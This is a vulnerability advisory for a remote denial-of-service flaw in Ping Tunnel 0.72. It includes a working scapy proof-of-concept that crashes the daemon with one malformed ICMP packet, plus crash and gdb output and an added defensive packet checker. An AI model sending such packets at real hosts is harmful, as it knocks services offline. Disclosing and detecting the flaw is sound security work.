Ping Tunnel (ptunnel) ICMP packet processing DoS Vulnerability


Affected Systems:
Freecode Ping Tunnel 0.72
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54627

Ping Tunnel (ptunnel) is a tool for reliably tunneling TCP connections over ICMP. It reaches a remote host using ICMP echo request and echo reply packets, commonly known as ping requests and replies.

A remote denial-of-service vulnerability exists in ptunnel 0.72 and possibly other versions. An attacker can exploit it to crash the affected application.

<* Source: st3n *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

st3n () provides the following test method:


#==============================================================================
# PoC code (scapy)
#==============================================================================

import sys
from scapy.all import *
conf.verb = 0   # suppress scapy's per-packet output

# Arg?
if len(sys.argv) < 2:
    sys.exit('usage: %s <remote_host>' % sys.argv[0])

# Target
remote_host = sys.argv[1]

# ptunnel.h
# typedef struct {
#     uint32_t magic,     // magic number, used to identify ptunnel packets.
#              dst_ip,    // destination IP and port (used by proxy to figure
#              dst_port,  // out where to tunnel)
#              state,     // current connection state; see constants above.
#              ack,       // sequence number of last packet received from other end
#              data_len;  // length of data buffer
#     uint16_t seq_no,    // sequence number of this packet
#              id_no;     // id number, used to separate different tunnels from each other
#     char     data[0];   // optional data buffer
# } __attribute__ ((packed)) ping_tunnel_pkt_t;

# Build packet (each uint32_t field is 4 bytes; seq_no and id_no together fill the last 4)
magic    = b'\xd5\x20\x08\x80'
dst_ip   = b'aaaa'
dst_port = b'bbbb'
state    = b'cccc'   # <=== this triggers the vulnerability
ack      = b'\x00\x00\x00\xff'
data_len = b'\x00\x00\x00\x00'
seq_id   = b'dddd'
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)

# Edevil packet
send(pkt)


#==============================================================================
# Example & Info
#==============================================================================

# Sending edevil packet
# ---------------------

# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets.


# Daemon side
# -----------

# $ ptunnel -c lo
# [inf]: Starting ptunnel v0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault


# Debug info
# ----------

# Program received signal SIGSEGV, Segmentation fault.
# handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbff65c, icmp_sock=7) at ptunnel.c:957
# 957         pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]\n",
# (gdb)
# (gdb) i r
# eax     0x3434343    54739779
# ecx     0x0          0
# edx     0x3434343    54739779
# ebx     0x8050184    134545796
# esp     0xbffff380   0xbffff380
# ebp     0xbffff468   0xbff468
# esi     0xffff       65535
# edi     0xbffff5c8   -1073744440
# eip     0x804cdfa    0x804cdfa
# eflags  0x10202      [ IF RF ]
# cs      0x73         115
# ss      0x7b         123
# ds      0x7b         123
# es      0x7b         123
# fs      0x0          0
# gs      0x33         51


# EOF
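A defensive counterpart to the test method above, added here and not part of the original advisory or of ptunnel itself: it parses the ping_tunnel_pkt_t header (layout quoted above) out of an ICMP echo payload and reports a state value outside the expected range, the field the PoC fills with 'cccc' before the proxy formats it in the log call seen in the crash frame, or a data_len that disagrees with the bytes actually present. The magic value comes from the PoC; the upper bound on valid state codes (MAX_VALID_STATE), the network byte order and the two sample packets are assumptions constructed for this example and should be checked against ptunnel.h.

```python
import struct

# Constructed example for checking ptunnel traffic; not ptunnel's own code.
PTUNNEL_MAGIC = 0xD5200880            # magic bytes used in the advisory's PoC
HEADER_FMT = "!IIIIIIHH"              # magic, dst_ip, dst_port, state, ack, data_len, seq_no, id_no
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 28 bytes, matching the quoted struct
MAX_VALID_STATE = 5                   # ASSUMPTION: highest state code in ptunnel.h; confirm against the header


def parse_ptunnel_header(payload):
    """Return the decoded header as a dict, or None if this is not a ptunnel packet."""
    if len(payload) < HEADER_LEN:
        return None
    fields = struct.unpack(HEADER_FMT, payload[:HEADER_LEN])
    if fields[0] != PTUNNEL_MAGIC:
        return None
    names = ("magic", "dst_ip", "dst_port", "state", "ack", "data_len", "seq_no", "id_no")
    hdr = dict(zip(names, fields))
    hdr["data"] = payload[HEADER_LEN:]   # optional data buffer that follows the header
    return hdr


def check_ptunnel_payload(payload):
    """Return a list of findings for one ICMP echo payload; an empty list means it passed."""
    hdr = parse_ptunnel_header(payload)
    if hdr is None:
        return []                        # not ptunnel traffic, nothing to check
    findings = []
    if hdr["state"] > MAX_VALID_STATE:
        findings.append("state 0x%08x outside the expected range 0..%d" % (hdr["state"], MAX_VALID_STATE))
    if hdr["data_len"] != len(hdr["data"]):
        findings.append("data_len %d does not match %d trailing bytes" % (hdr["data_len"], len(hdr["data"])))
    return findings


# Constructed samples: a well-formed packet with state 0 and no data, and the
# header the PoC above sends (state 'cccc' = 0x63636363, ack 0xff, seq/id 'dddd').
BENIGN = struct.pack(HEADER_FMT, PTUNNEL_MAGIC, 0x7F000001, 22, 0, 0, 0, 1, 42)
MALFORMED = struct.pack(HEADER_FMT, PTUNNEL_MAGIC, 0x61616161, 0x62626262,
                        0x63636363, 0xFF, 0, 0x6464, 0x6464)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(label, check_ptunnel_payload(sample) or "ok")
```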

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Freecode
--------
At the time of writing the vendor has not released a patch or upgrade. Users of the software should watch the vendor's homepage for a fixed version:

http://freecode.com/projects/
